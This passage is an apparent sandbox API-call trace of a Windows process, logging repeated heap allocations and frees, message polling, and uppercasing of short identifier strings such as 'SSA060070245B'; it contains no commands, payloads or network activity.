Flags=0x0, Size=0x10) returned 0x24aa830 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0261.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0261.587] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.587] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0261.587] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.587] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.588] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.588] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.588] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.589] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.589] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.589] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0261.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.590] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0261.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.592] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.592] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.592] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0261.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.593] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.593] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.593] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.593] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.593] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.593] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.593] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 